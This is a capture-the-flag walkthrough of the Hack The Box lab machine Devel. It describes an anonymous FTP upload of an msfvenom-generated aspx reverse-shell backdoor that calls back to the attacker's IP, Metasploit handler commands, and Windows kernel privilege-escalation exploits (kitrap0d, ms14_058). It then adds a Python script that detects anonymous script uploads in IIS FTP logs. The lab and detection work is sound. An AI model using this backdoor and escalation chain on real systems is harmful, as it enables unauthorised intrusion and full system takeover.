Welcome to another walkthrough from the Hack The Box challenges. The machine is Devel.
IP: 10.10.10.5
OS: Windows.
Enumeration:
Nmap scan reveals ports 21 and 80 are open. Port 21 allows anonymous FTP login.
Exploitation:
The website on port 80 runs the default IIS landing page (Microsoft's web server). It is a dead end on its own, as there is nothing of interest in the HTML source either.
Using Burp we see that the web page is powered by ASP.NET. This tells us which msfvenom payload format to use for the backdoor: aspx.
Method 1.
We connect to FTP using the anonymous login noted in the nmap scan. Username: anonymous, Password: anonymous. We can do this either with the FileZilla tool, which is available on Kali, or from the command line.
Using command line:
We log in, run the dir command and see a few files. We then create a file test.html (echo fresec > test.html) and upload it with the put command. We chose an .html file because another HTML file, "iisstart.htm", was already there, which suggests this directory is the web root.
The upload succeeds, and browsing to test.html we see that the page is served by the web server.
Next we generate an aspx backdoor using msfvenom and also start the multi/handler in the Metasploit framework.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f aspx > fresec.aspx
Next we start our Metasploit handler (the commands are shown below), upload the aspx backdoor, browse to it in the web browser, and we get a shell :).
Privilege Escalation:
Next we run post/multi/recon/local_exploit_suggester for privilege escalation.
Numerous exploits are suggested, but I chose to use "exploit/windows/local/ms10_015_kitrap0d".
msf exploit(ms10_015_kitrap0d) >set lhost 10.10.14.20
msf exploit(ms10_015_kitrap0d) >set lport 4321
msf exploit(ms10_015_kitrap0d) >set session 2
msf exploit(ms10_015_kitrap0d) >exploit
We get a meterpreter session as NT AUTHORITY\SYSTEM!
Meterpreter > getuid
Using FileZilla:
We log in using the username anonymous and any password. The remote host is 10.10.10.5 and the port is 21.
We start our Metasploit handler and then transfer the aspx backdoor we created to the remote (victim) machine.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.20
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit
Then we upload the aspx backdoor, browse to http://10.10.10.5/fresec.aspx to execute it, and get a meterpreter shell.
Next we run the local exploit suggester to list privilege escalation exploits, and I chose "exploit/windows/local/ms14_058_track_popup_menu". Running the commands below gives an NT AUTHORITY\SYSTEM shell!
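From the defender's side, the foothold used in both methods above leaves a clear trace: an anonymous FTP session writing a server-side script into the IIS web root. The following is an added example, not part of the original walkthrough: it scans IIS FTP W3C-format logs for exactly that pattern. The log lines are constructed for illustration, and the field order is assumed to match the default IIS 7.5 FTP logging fields.

```python
"""Detect anonymous FTP uploads of server-side scripts into an IIS web root.

Added example, not part of the Devel walkthrough. The log below is
constructed in the IIS FTP W3C format; the field order is assumed to match
the default IIS 7.5 FTP logging fields.
"""
import os

# Constructed sample log: an anonymous session uploads an .html probe and an
# .aspx page, then an authenticated user uploads a legitimate .aspx page.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-01-01 10:00:01 10.10.14.20 - 10.10.10.5 21 USER anonymous 331 0 0 1a2b /
2024-01-01 10:00:02 10.10.14.20 anonymous 10.10.10.5 21 PASS *** 230 0 0 1a2b /
2024-01-01 10:00:05 10.10.14.20 anonymous 10.10.10.5 21 STOR test.html 226 0 0 1a2b /test.html
2024-01-01 10:00:30 10.10.14.20 anonymous 10.10.10.5 21 STOR fresec.aspx 226 0 0 1a2b /fresec.aspx
2024-01-01 11:00:00 10.10.14.21 deploy 10.10.10.5 21 STOR report.aspx 226 0 0 9c9c /report.aspx
"""

# Extensions IIS executes server-side when the file is requested over HTTP.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}


def parse_w3c(text):
    """Return one dict per log entry, keyed by the names in the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # the header defines the columns
        elif line and not line.startswith("#"):
            parts = line.split()
            if len(parts) == len(fields):      # skip truncated entries
                rows.append(dict(zip(fields, parts)))
    return rows


def find_anonymous_script_uploads(text, exts=SCRIPT_EXTS):
    """Return (timestamp, client_ip, path) for each completed anonymous STOR
    of a server-side script; a 2xx sc-status means the transfer succeeded."""
    alerts = []
    for row in parse_w3c(text):
        ext = os.path.splitext(row["x-fullpath"].lower())[1]
        if (row["cs-username"].lower() == "anonymous"
                and row["cs-method"] == "STOR"
                and row["sc-status"].startswith("2")
                and ext in exts):
            alerts.append((f"{row['date']} {row['time']}", row["c-ip"], row["x-fullpath"]))
    return alerts


if __name__ == "__main__":
    for when, ip, path in find_anonymous_script_uploads(SAMPLE_LOG):
        print(f"ALERT {when} anonymous upload of {path} from {ip}")
```

The .html probe and the authenticated upload are deliberately left out of the result, so the check fires only on the combination that actually matters: anonymous write access plus an executable page.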
>set lhost 10.10.14.20
>set lport 4321
>set session 1
>exploit